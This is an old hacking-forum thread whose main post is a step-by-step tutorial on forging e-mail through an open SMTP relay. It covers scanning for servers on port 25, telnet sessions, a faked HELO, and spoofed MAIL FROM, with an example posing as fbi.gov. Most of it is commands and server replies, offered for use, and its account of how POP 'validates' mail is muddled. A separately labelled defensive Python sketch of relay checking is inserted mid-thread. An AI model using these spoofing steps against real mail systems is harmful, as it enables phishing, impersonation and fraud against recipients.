View Full Version : Another Forging E-mail tut



Nexus_Logik
01-05-2008, 10:47 PM
.....where do I begin.......first off, SMTP and ESMTP have NOTHING to do with POP*...

Simple Mail Transfer Protocol or SMTP is a mail protocol used to SEND mail. Post Office Protocol or POP (POP*) is a protocol used to receive mail. This is a direct flow in SOME SMTP servers. Most open SMTP servers with no authentication will be exploitable to this; the exploit is easy as pie to pull off manually.

Step One - Find a open smtp server

This is the hardest part, and the best way to find one, if you do not know of one off hand, is to do a network scan with such tools as SuperScan or NetScan, and scan for port 25, which is the standard SMTP TCP/IP port.

Step Two - Connecting

Once we have acquired a suitable system, we then open up a telnet session (start -> run -> type "cmd" and click OK -> at the black screen type "telnet [host name/ip] 25" and hit enter).

Now let's break this down for those who are unaware of how telnet works: telnet [host/ip] 25
telnet - obviously the command to open the telnet program
[host/ip] - this is where you place the IP address or host name of the system
25 - port 25 is the standard SMTP port

Alternative way

start -> run -> type "cmd" and hit enter -> at the black screen type "telnet" -> at the telnet> prompt type "connection" -> at the "to" prompt type "[hostname/ip] 25" and hit enter

Step * - introducing yourself to the system

Once connected you should see something along the lines of
Code:

You should receive a reply like:
Trying ???.???.???.???...
Connected to [hostname].
Escape character is '^]'.
220 [hostname/ip] SMTP Sendmail ?version-number?;

Now we tell the system who "we" are. To do this we use the "HELO" command.
Code:

HELO [something fake]

and the system will reply to you
Code:

250 [Target Host/IP] Hello [Fake Host/IP], pleased to meet you

Now, do not quote me on this because I am not sure if this works anymore, but one used to be able to fool the header simply by using the correct host system... hence if you're sending this mail to someone saying you're "joe@fbi.gov" you would put
Code:

HELO www.fbi.gov

Step 4 - Sending the e-mail

Now is when we declare who we are sending the e-mail to, who it will be from, and also include the message.

First we have to tell the system who we are by using the following command
Code:

MAIL FROM: mail@domain.ext

This is where you will put the fake e-mail addy. There will be a slight pause or delay and you should get replied back
Code:

250 2.*.0 mail@domain.ext... Sender ok

Once again the mail@domain.ext would be the fake addy. Now we tell the system who we are sending this e-mail to
Code:

RCPT TO: mail@target.ext

The system will reply back to you
Code:

250 2.*.0 mail@target.ext... Recipient ok

Input subject
Code:

Subject: -type subject here-

Then hit enter twice to confirm it; once this happens you use the DATA command to start the e-mail.
Code:

data [your text]

Now to complete the letter you hit enter and on the blank line you type a single "." and hit enter. Now if done correctly you should get
Code:

250 2.0.0 ???????? Message accepted for delivery

Now we just type "quit" and will get
Code:

22* 2.0.0 [Targethost] closing connection
Connection closed by foreign host.

Congrats you have just sent a forged e-mail.

Now from here the SMTP will send it over to the POP*; because it is coming from a "trusted" server the POP* should self-validate it and send it on through. So this hack is not hacking the POP* so much as just confusing it. See, the POP* is made to accept e-mails that are validated..... the SMTP with no authentication is already a security risk in the first place.

What have we learned?

Forged e-mails are an exploit based off the SMTP server; because this SMTP server validates the e-mail on its end, the POP* does not know the difference.

Enjoy
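
As an added example (not code from this thread or its author), here is the envelope stage of an SMTP session with the relay check that the open server in the tutorial above lacks: the greeting name and MAIL FROM are accepted at face value, and the decision is made at RCPT TO. The server name, local domain and addresses are constructed.

```python
import re

# Constructed values: the domain this server delivers for, and its own name.
LOCAL_DOMAINS = {"example.org"}
SERVER_NAME = "mail.example.org"

# Accepts "MAIL FROM:<a@b>" as well as the bare "MAIL FROM: a@b" form used above.
ENVELOPE_RE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<?([^<>\s]+@[^<>\s]+)>?$", re.I)


class SmtpSession:
    """Envelope stage of one SMTP session, with relay control at RCPT TO."""

    def __init__(self, authenticated=False):
        self.authenticated = authenticated  # True only after a successful AUTH
        self.helo = None
        self.mail_from = None
        self.recipients = []

    def handle(self, line):
        """Return the server reply for one client command line."""
        cmd = line.strip()
        verb = cmd.split(" ", 1)[0].upper()
        if verb in ("HELO", "EHLO"):
            # The greeting name is recorded as given; it proves nothing.
            self.helo = cmd.split(" ", 1)[1] if " " in cmd else ""
            return f"250 {SERVER_NAME} Hello {self.helo}, pleased to meet you"
        m = ENVELOPE_RE.match(cmd)
        if not m:
            return "500 5.5.1 Command unrecognized"
        field, addr = m.group(1).upper(), m.group(2)
        domain = addr.rsplit("@", 1)[1].lower()
        if field == "MAIL FROM":
            if self.helo is None:
                return "503 5.5.1 Send HELO/EHLO first"
            # Any sender address is accepted here: the envelope sender is a
            # claim, not a credential. Relay control happens on the recipient.
            self.mail_from = addr
            return f"250 2.1.0 {addr}... Sender ok"
        if self.mail_from is None:
            return "503 5.5.1 Need MAIL command"
        # An open relay skips this test and says "Recipient ok" to everyone.
        if domain in LOCAL_DOMAINS or self.authenticated:
            self.recipients.append(addr)
            return f"250 2.1.5 {addr}... Recipient ok"
        return f"550 5.7.1 {addr}... Relaying denied"
```

Even a closed relay still accepts any MAIL FROM for its own local recipients, which is why sender-verification mechanisms (SPF, DKIM, DMARC) exist on top of relay control.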

Moonbat
01-06-2008, 08:53 PM
I covered most of this in my tut, but nice job anyway :D

Nexus_Logik
01-07-2008, 10:53 AM
Yeah I saw your post, and noticed a lot of people were asking questions on a few things. So I decided to toss it up there.